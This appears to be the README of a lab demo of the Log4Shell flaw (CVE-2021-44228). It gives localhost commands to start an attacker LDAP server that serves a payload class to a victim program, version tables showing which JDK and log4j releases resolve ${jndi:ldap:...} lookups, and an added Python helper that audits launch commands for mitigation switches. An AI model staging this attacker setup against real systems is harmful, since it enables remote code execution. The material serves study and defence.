sample-ldap-exploit
A short demo of CVE-2021-44228
Build
$ mvn clean verify
Run Attacker
$ java \
-cp 'attacker/target/sample-attacker.jar:attacker/target/lib/*' \
sample.attacker.Attacker localhost 1389 sample.payload.Payload 8080 payload/target/sample-payload.jar
URLs:
http://localhost:8080/
http://localhost:8080/sample/payload/Payload.class
Run Victim
$ java \
-cp 'victim/target/sample-victim.jar:victim/target/lib/*' \
sample.victim.Victim
Results
JDK / JRE
Version | Status |
---|---|
Oracle JDK 8u5 | vulnerable |
OpenJDK 8u312 | NOT vulnerable (unless -Dcom.sun.jndi.ldap.object.trustURLCodebase=true) |
IBM OpenJDK 8u312-b07 (OpenJ9) | NOT vulnerable (unless -Dcom.sun.jndi.ldap.object.trustURLCodebase=true) |
OpenJDK 11.0.7+10 | NOT vulnerable (unless -Dcom.sun.jndi.ldap.object.trustURLCodebase=true) |
OpenJDK 11.0.13+8 | NOT vulnerable (unless -Dcom.sun.jndi.ldap.object.trustURLCodebase=true) |
OpenJDK 16+36 | NOT vulnerable (unless -Dcom.sun.jndi.ldap.object.trustURLCodebase=true) |
OpenJDK 17+35 | NOT vulnerable (unless -Dcom.sun.jndi.ldap.object.trustURLCodebase=true) |
OpenJDK 17.0.1+12 | NOT vulnerable (unless -Dcom.sun.jndi.ldap.object.trustURLCodebase=true) |
If NOT vulnerable, an instance of javax.naming.Reference is returned from javax.naming.Context.lookup().
Even if a JDK is NOT vulnerable to loading classes from remote code bases, other Java deserialization vulnerabilities probably still exist!
log4j
Version | Status |
---|---|
2.9.1 | vulnerable |
2.10.0 | vulnerable (unless -Dlog4j2.formatMsgNoLookups=true or environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true) |
2.14.1 | vulnerable (unless -Dlog4j2.formatMsgNoLookups=true or environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true) |
2.15.0 | NOT vulnerable |
If NOT vulnerable, ${jndi:ldap:...} is NOT resolved.
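An added example, not part of this repository: a small audit helper that applies the two results tables to a Java launch command and its environment. It also covers the case where a -D switch is placed after the main class and is therefore never seen by the JVM. The function names, the version thresholds for untested releases and the sample command lines are assumptions made for this illustration.

```python
import shlex

# Thresholds read off the log4j results table on this page. Treating untested
# versions like their nearest tested neighbour is an assumption.
SWITCH_SINCE = (2, 10, 0)  # 2.10.0 and 2.14.1 honour formatMsgNoLookups
FIXED_SINCE = (2, 15, 0)   # 2.15.0 did not resolve ${jndi:ldap:...}
TAKES_VALUE = {"-cp", "-classpath", "--class-path"}  # options with a separate value


def system_properties(command_line):
    """Return the -Dkey=value options the JVM itself will see."""
    props, skip = {}, False
    for token in shlex.split(command_line)[1:]:  # [0] is the java executable
        if skip:
            skip = False
        elif token in TAKES_VALUE:
            skip = True
        elif token == "-jar" or not token.startswith("-"):
            break  # main class reached: the rest are application arguments
        elif token.startswith("-D"):
            key, _, value = token[2:].partition("=")
            props[key] = value
    return props


def is_true(value):
    return (value or "").strip().lower() == "true"


def assess(log4j_version, command_line, env=None):
    """Classify one (hypothetical) process against the two tables above."""
    env = env or {}
    props = system_properties(command_line)
    version = tuple(int(part) for part in log4j_version.split(".")[:3])
    no_lookups = (is_true(props.get("log4j2.formatMsgNoLookups"))
                  or is_true(env.get("LOG4J_FORMAT_MSG_NO_LOOKUPS")))
    if version >= FIXED_SINCE:
        resolved = False
    elif version >= SWITCH_SINCE:
        resolved = not no_lookups
    else:
        resolved = True  # the 2.9.1 row lists no switch
    return {
        "jndi_lookup_resolved": resolved,
        "trust_url_codebase_forced": is_true(
            props.get("com.sun.jndi.ldap.object.trustURLCodebase")),
    }
```

A process with trust_url_codebase_forced set has given up the JDK-side protection shown in the first table, whatever its log4j version.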